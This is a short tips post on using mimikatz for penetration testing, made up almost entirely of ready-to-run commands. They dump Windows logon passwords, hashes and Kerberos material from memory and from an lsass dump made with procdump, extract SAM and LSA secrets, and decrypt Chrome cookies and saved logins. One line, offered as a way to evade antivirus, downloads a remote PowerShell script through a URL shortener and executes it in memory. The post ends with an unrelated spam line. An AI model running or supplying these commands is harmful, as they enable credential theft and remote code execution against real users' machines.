[Tips] Using mimikataz on penetration testing

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.

It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Print mimikatz implementation process log
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

 

Read the password exported in mimikatz directory

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

 

 

Use powershell to bypass AV

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

 

 

procdump lsass process export

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits

C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

 

 

mimikatz.exe

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

 

Get the vpn password
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

 

Get the Browser password

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

Check out Money Brighter to learn how to get an llc in texas in 6 simpler steps.